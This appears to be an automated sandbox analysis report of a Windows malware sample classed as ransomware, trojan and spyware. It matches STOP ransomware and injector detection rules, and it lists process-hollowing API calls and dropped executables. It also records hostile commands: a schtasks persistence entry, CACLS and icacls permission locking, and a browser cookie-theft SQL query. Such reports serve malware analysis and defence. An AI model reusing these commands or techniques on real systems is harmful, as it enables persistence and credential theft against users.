Source: Process Memory Space: 5274.exe PID: 5428, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5274.exe PID: 5780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe, type: DROPPED	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 0042F7C0 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 00428520 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 04128EC0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 04130160 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: String function: 004547A0 appears 31 times

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401558
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	0_2_00401749
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401523
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401585
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040158C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159A
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401558
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	4_2_00401749
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401564
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401577
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401523
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401585
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040158C
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040159A
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_04100110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,	5_2_04100110

Source: 2A49.dll.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: A41A.dll.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rfuiwjh

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@75/32@148/24

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

6_2_00411900

Source: cacls.exe, 00000029.00000002.681824020.0000000000600000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: file.exe

ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rfuiwjh C:\Users\user\AppData\Roaming\rfuiwjh
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E640.exe C:\Users\user\AppData\Local\Temp\E640.exe
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process created: C:\Users\user\AppData\Local\Temp\E640.exe C:\Users\user\AppData\Local\Temp\E640.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\617B.exe C:\Users\user\AppData\Local\Temp\617B.exe
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process created: C:\Users\user\AppData\Local\Temp\617B.exe C:\Users\user\AppData\Local\Temp\617B.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe C:\Users\user\AppData\Local\Temp\5274.exe
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe C:\Users\user\AppData\Local\Temp\5274.exe
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C474.exe C:\Users\user\AppData\Local\Temp\C474.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\325D.exe C:\Users\user\AppData\Local\Temp\325D.exe
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process created: C:\Users\user\AppData\Local\Temp\C474.exe C:\Users\user\AppData\Local\Temp\C474.exe
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\96DF.exe C:\Users\user\AppData\Local\Temp\96DF.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FE5F.exe C:\Users\user\AppData\Local\Temp\FE5F.exe
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Process created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe"
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "user:N"&&CACLS "..\207aa4515d" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:R" /E
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E640.exe C:\Users\user\AppData\Local\Temp\E640.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\617B.exe C:\Users\user\AppData\Local\Temp\617B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe C:\Users\user\AppData\Local\Temp\5274.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C474.exe C:\Users\user\AppData\Local\Temp\C474.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\325D.exe C:\Users\user\AppData\Local\Temp\325D.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\96DF.exe C:\Users\user\AppData\Local\Temp\96DF.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FE5F.exe C:\Users\user\AppData\Local\Temp\FE5F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process created: C:\Users\user\AppData\Local\Temp\E640.exe C:\Users\user\AppData\Local\Temp\E640.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process created: C:\Users\user\AppData\Local\Temp\617B.exe C:\Users\user\AppData\Local\Temp\617B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe C:\Users\user\AppData\Local\Temp\5274.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process created: C:\Users\user\AppData\Local\Temp\C474.exe C:\Users\user\AppData\Local\Temp\C474.exe
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Process created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe"
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "user:N"&&CACLS "..\207aa4515d" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\325D.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\E640.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

6_2_0040D240

Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: aafg31.exe, 0000001A.00000003.788041277.0000000000E99000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.783994033.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.754741360.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.774649444.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.801135732.0000000000E45000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.790922280.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.774610566.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.801467289.0000000000E9A000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.786845794.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: aafg31.exe, 0000001A.00000003.788041277.0000000000E99000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.783994033.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.790922280.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.786845794.0000000000E95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;xC
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aafg31.exe, 0000001A.00000002.801582561.00000000027E0000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.842271635.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\AppData\Local\Temp\325D.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 5_2_03FE97C6 CreateToolhelp32Snapshot,Module32First,

5_2_03FE97C6

Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_01

Source: E640.exe	String found in binary or memory: set-addPolicy
Source: E640.exe	String found in binary or memory: id-cmc-addExtensions
Source: E640.exe	String found in binary or memory: set-addPolicy
Source: E640.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E640.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C474.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\C474.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	File read: C:\Windows\System32\drivers\etc\hosts
